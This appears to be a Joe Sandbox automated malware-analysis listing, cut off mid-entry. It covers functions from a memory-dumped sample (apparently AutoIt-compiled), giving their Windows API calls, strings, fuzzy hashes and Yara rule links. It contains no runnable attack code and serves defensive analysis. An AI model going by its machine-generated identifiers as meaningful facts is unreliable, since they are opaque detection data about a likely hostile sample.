Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: ff1fd91685a7cdf1a364ccba0534daaa0b78e7741226f6feddd27acf3963ef8b
Instruction ID: 7bd69ba6afea0c8f6dd7069a50fda6b52326c3ffb594a5af8b099a5a0c113b02
Opcode Fuzzy Hash: ff1fd91685a7cdf1a364ccba0534daaa0b78e7741226f6feddd27acf3963ef8b
Instruction Fuzzy Hash: 0BF03432006258BADB136F54AC0EFCE3B6DAF0E321F048001FA21211E2C7B595629BE9

Function 002821A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 002821BC
SetTextColor.GDI32(?,?), ref: 002821C6
SetBkMode.GDI32(?,00000001), ref: 002821D9
GetStockObject.GDI32(00000005), ref: 002821E1

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 8a1a610ae31156d3c9dc44729935ce9b4394073a3375741c19cd0b300a624db6
Instruction ID: e16466e6beaccebb7ade348a500f81a75da2be32c8c0ca073c9cbcc1711469bc
Opcode Fuzzy Hash: 8a1a610ae31156d3c9dc44729935ce9b4394073a3375741c19cd0b300a624db6
Instruction Fuzzy Hash: B2E06D32240641BADB229F74AC09BE83B25AB1B336F14C729F7FA580E0C77286509B11

Function 002DEC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 002DEC36
GetDC.USER32(00000000), ref: 002DEC40
GetDeviceCaps.GDI32(00000000,0000000C), ref: 002DEC60
ReleaseDC.USER32(?), ref: 002DEC81

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: afb7593196e6dcf03c0a7893f9b9850bd16479fad45ebaae25e446ca82cd98ed
Instruction ID: 14c93798e9c787b068da2b8d84db8930a3e154bc0a9a6eb510434599493aca2d
Opcode Fuzzy Hash: afb7593196e6dcf03c0a7893f9b9850bd16479fad45ebaae25e446ca82cd98ed
Instruction Fuzzy Hash: 9DE01A74810204DFCF42AFA0C908A9DBBB9EB0D310F11C40AE80AE3250C77859519F00

Function 002DEC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 002DEC4A
GetDC.USER32(00000000), ref: 002DEC54
GetDeviceCaps.GDI32(00000000,0000000C), ref: 002DEC60
ReleaseDC.USER32(?), ref: 002DEC81

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 5c886825d303786157eeb412a7ea699f65e425819c627c8d48604463afb8620d
Instruction ID: e2df7d58bf9690474518f64cda85b81b267fd395f113f716f7e2590883763387
Opcode Fuzzy Hash: 5c886825d303786157eeb412a7ea699f65e425819c627c8d48604463afb8620d
Instruction Fuzzy Hash: 63E012B4C00204EFCF42AFA0C808A9DBBB9AB0D310F108409E80AE3290CB786A119F00

Function 002D3616 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 409COMMON

Download Yara Rule

Strings

@COM_EVENTOBJ, xrefs: 002D3AD6
bn., xrefs: 002D3631, 002D38EA, 002D3903, 002D3B3F, 002D3B58

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: LoadString
String ID: @COM_EVENTOBJ$bn.
API String ID: 2948472770-4085954395
Opcode ID: 159cdc2ef438e8e355bc14e70063586d146240a6c33a3b54480ce2cb495deed5
Instruction ID: 2cc3b6655041ea62162602fff437787052147229054aa0c57e4dc01662013775
Opcode Fuzzy Hash: 159cdc2ef438e8e355bc14e70063586d146240a6c33a3b54480ce2cb495deed5
Instruction Fuzzy Hash: 3DF15870A282019FD714DF14C881B6AB7E0BF84704F54895AF58A973A1DB71EE65CF83

Function 003085DB Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 002A05B2: EnterCriticalSection.KERNEL32(0035170C,?,00000000,?,0028D22A,00353570,00000001,00000000,?,?,002FF023,?,?,00000000,00000001,?), ref: 002A05BD
Part of subcall function 002A05B2: LeaveCriticalSection.KERNEL32(0035170C,?,0028D22A,00353570,00000001,00000000,?,?,002FF023,?,?,00000000,00000001,?,00000001,00352430), ref: 002A05FA

Part of subcall function 0028B329: _wcslen.LIBCMT ref: 0028B333

Part of subcall function 002A0413: __onexit.LIBCMT ref: 002A0419

__Init_thread_footer.LIBCMT ref: 00308658

Part of subcall function 002A0568: EnterCriticalSection.KERNEL32(0035170C,00000000,?,0028D258,00353570,002C27C9,00000001,00000000,?,?,002FF023,?,?,00000000,00000001,?), ref: 002A0572
Part of subcall function 002A0568: LeaveCriticalSection.KERNEL32(0035170C,?,0028D258,00353570,002C27C9,00000001,00000000,?,?,002FF023,?,?,00000000,00000001,?,00000001), ref: 002A05A5

Strings

Variable must be of type 'Object'., xrefs: 00308697
bn., xrefs: 003085E5, 0030887F

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: Variable must be of type 'Object'.$bn.
API String ID: 535116098-2715918354
Opcode ID: 256e03c0989158a6f3cea728d7fbfb5dcb7e00012944af541cc2b0b7a8c39933
Instruction ID: 2601d49ee50f1a4616b96574b4aec5a7f812d1944955630a9d3528000b8cc171
Opcode Fuzzy Hash: 256e03c0989158a6f3cea728d7fbfb5dcb7e00012944af541cc2b0b7a8c39933
Instruction Fuzzy Hash: 36918D74A02208EFCB06EF54D8A1DADBBB5BF08700F51805DF945AB2D2DB71AE45CB50

Function 002F57CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 002841EA: _wcslen.LIBCMT ref: 002841EF

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 002F5919

Strings

*, xrefs: 002F5855
LPT, xrefs: 002F5840

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 21c93a00789b202ce078225292cafdaa193e99a801dac354c4a983433534092f
Instruction ID: 195dd03ad8253b14874602574b07147e54bab0c748068087a0cc25ec9a8c8bea
Opcode Fuzzy Hash: 21c93a00789b202ce078225292cafdaa193e99a801dac354c4a983433534092f
Instruction Fuzzy Hash: 3591BE74A10619DFCB14DF54C484EA9BBF1AF44344F1880A9EA495F3A2C771EE95CF90

Function 002E5703 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 223comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 002E58AF

Strings

Container, xrefs: 002E581E
0$5, xrefs: 002E5952

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ContainedObject
String ID: 0$5$Container
API String ID: 3565006973-2951443912
Opcode ID: 82bf5db23714a932029aa0d5be45b15bfe1ca321a4acbd5719fb0228a1764b85
Instruction ID: 65c4309b68ca5ac64f86b0678f8e4497838f3a320f8c20ad2342b444453e1647
Opcode Fuzzy Hash: 82bf5db23714a932029aa0d5be45b15bfe1ca321a4acbd5719fb0228a1764b85
Instruction Fuzzy Hash: 66815A70610611EFDB14CF55C884AAABBF9FF49714F10856DF94A8F2A1DBB0E851CB60

Function 002AE5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 002AE67D

Strings

pow, xrefs: 002AE655, 002AE672

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 68777100de6252c459f16f621c976ed7c11f65a4bfb1860586b78a66be7bfe74
Instruction ID: daba6e0526d3b304428ec7c8413adfb3919f3ce56c49e1064a6b36179970b802
Opcode Fuzzy Hash: 68777100de6252c459f16f621c976ed7c11f65a4bfb1860586b78a66be7bfe74
Instruction Fuzzy Hash: 6C517B61E3910397CB12BF18DD013EA6BACAB51B80F214D58E09D422A9DF758CB7DA46

Function 0029A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0029A916

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 7c802c5c9351ec0be14cd61731df4810b59d1656c8a4b475a00d8ddf7338ab95
Instruction ID: 990739c55ad357e8cf7cf9627bb8f4c4519f94e63cce40c92e090a7fd7dfbca8
Opcode Fuzzy Hash: 7c802c5c9351ec0be14cd61731df4810b59d1656c8a4b475a00d8ddf7338ab95
Instruction Fuzzy Hash: 6B5140315253479FDF25EF28C441ABA7BB4AF16310F64805AF8819B3C0DB349DA2CBA1

Function 0029F6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0029F6DB
GlobalMemoryStatusEx.KERNEL32(?), ref: 0029F6F4

Strings

@, xrefs: 0029F6E8

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 0937ba6e2c913d88b05164fa5eb0acc7aa959909131acb8a9040af1b15ff976c
Instruction ID: d937115cdc001abf35e05b2283636cf78f5346e7b19209d63e7909231657dac8
Opcode Fuzzy Hash: 0937ba6e2c913d88b05164fa5eb0acc7aa959909131acb8a9040af1b15ff976c
Instruction Fuzzy Hash: 0B5136718197489BD320AF10DC86BABBBECFB95304F81885DF1D9411A1EB309579CB66

Function 002FDB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 002FDB75
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 002FDB7F

Strings

|, xrefs: 002FDB50

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 72f36b50bb27af477c82e58fd5d2d3966a1eb629174ee62c40b6068f888f868e
Instruction ID: 90dfd9d9c056e10fe11df09b726b5511c3efee4d7d092dcb37f429d9b5ea991e
Opcode Fuzzy Hash: 72f36b50bb27af477c82e58fd5d2d3966a1eb629174ee62c40b6068f888f868e
Instruction Fuzzy Hash: DB316F7182110DABCF05EFA4CC859EEBFB9FF05344F504029F915A61A6EB719926CF50

Function 00314008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 003140BD
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 003140F8

Strings

static, xrefs: 00314058

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 524deac050e9d2b1f077268a3419387aab4f7943d4d4f9c8df04b9d796f72a8b
Instruction ID: d2e8ab2c6e9b8ee5b2c788e3bfc63aec6dd370fbb70cfdc0f7116d101c46c5b8
Opcode Fuzzy Hash: 524deac050e9d2b1f077268a3419387aab4f7943d4d4f9c8df04b9d796f72a8b
Instruction Fuzzy Hash: 05319E71110604AADB29DF69CC80AFB73ADFF4D720F018619F9A987190DA71AC91DB60

Function 00314FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 003150BD
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003150D2

Strings

', xrefs: 0031502C

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: b801b5b1137e480853e27ccf1719f1a02d8f9b5cbe80ef2000cbc2630d601278
Instruction ID: 4f13c780990ad2934c2bae2edcc0528f839b4cd5fb691fafcea59a2780a0b9d8
Opcode Fuzzy Hash: b801b5b1137e480853e27ccf1719f1a02d8f9b5cbe80ef2000cbc2630d601278
Instruction Fuzzy Hash: 4A31E774A0160ADFDB19CFA5C980BDA7BB9FF4D300F114069E904AB391D771A995CF90

Function 002820B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 0028249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002824B0

Part of subcall function 00282234: GetWindowLongW.USER32(?,000000EB), ref: 00282242

GetParent.USER32(?), ref: 002C3440
DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 002C34CA

Strings

(5, xrefs: 002820B9

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: LongWindow$ParentProc
String ID: (5
API String ID: 2181805148-4024434197
Opcode ID: 414a7309736f23fbc9fee6f402f0aabdaacd60ce4893b81ac97a5bdb53e40295
Instruction ID: e8356dff802ad81623d2e1f19c272b1d2438761fc182e0e1f5256f0a11224f04
Opcode Fuzzy Hash: 414a7309736f23fbc9fee6f402f0aabdaacd60ce4893b81ac97a5bdb53e40295
Instruction Fuzzy Hash: 4A219139212155EFCB2AEF68C849EA53B66EF06360F144644F6294B2F2C3319E69DB10

Function 003141AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00287873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 002878B1
Part of subcall function 00287873: GetStockObject.GDI32(00000011), ref: 002878C5
Part of subcall function 00287873: SendMessageW.USER32(00000000,00000030,00000000), ref: 002878CF

GetWindowRect.USER32(00000000,?), ref: 00314216
GetSysColor.USER32(00000012), ref: 00314230

Strings

static, xrefs: 003141F3

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 9943a298200d24493fe38a584d46f33b8b8816cb54d080d808cd24121ca73bbf
Instruction ID: 0128535b9667201f6a9c4437aa17710f16dbe1f30dfa3f03d38dbd581fdff2cd
Opcode Fuzzy Hash: 9943a298200d24493fe38a584d46f33b8b8816cb54d080d808cd24121ca73bbf
Instruction Fuzzy Hash: 1B112372610209AFDB06DFA8CC45AEA7BE8EB09314F014924F955E3250E734E8A19B60

Function 002FD763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 002FD7C2
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 002FD7EB

Strings

<local>, xrefs: 002FD7AB

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 3ad2658b50497645b0972468b1be617a6ba92bf5f6b2253c13c883817954639d
Instruction ID: 0257eab29c6404949de7172a528a90e5eeab2acf30694b65de4f89541e8a4358
Opcode Fuzzy Hash: 3ad2658b50497645b0972468b1be617a6ba92bf5f6b2253c13c883817954639d
Instruction Fuzzy Hash: CD11067216123AB9D7385F628C49EF7FE9EEB127E4F104236F6098A080D2A49850D2F0

Function 002E75ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0028B329: _wcslen.LIBCMT ref: 0028B333

CharUpperBuffW.USER32(?,?,?), ref: 002E761D
_wcslen.LIBCMT ref: 002E7629

Strings

STOP, xrefs: 002E7623, 002E7628

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 39101164f18bcd8f26170db93a49f213f1d35bee095f4413bd08d2608917792b
Instruction ID: b4bc27770ba8b880f1bf7143c8db5483391f361ff707701d38ccaca37a481d90
Opcode Fuzzy Hash: 39101164f18bcd8f26170db93a49f213f1d35bee095f4413bd08d2608917792b
Instruction Fuzzy Hash: 6C010432A74A678BCB11AFBECC408BF33B9BB61358B800928E421961D1EB70D8208750

Function 002E262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0028B329: _wcslen.LIBCMT ref: 0028B333

Part of subcall function 002E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002E4620

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 002E2699

Strings

ComboBox, xrefs: 002E2638
ListBox, xrefs: 002E2663

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: e8622d1798432e065b2f0b7fd00c47c21c75f9bfb38368387bac1ff8246e0e6f
Instruction ID: 9998e9f256282dcbacf2c20c8775b1f09a3683b7606770188ad231902d75fc35
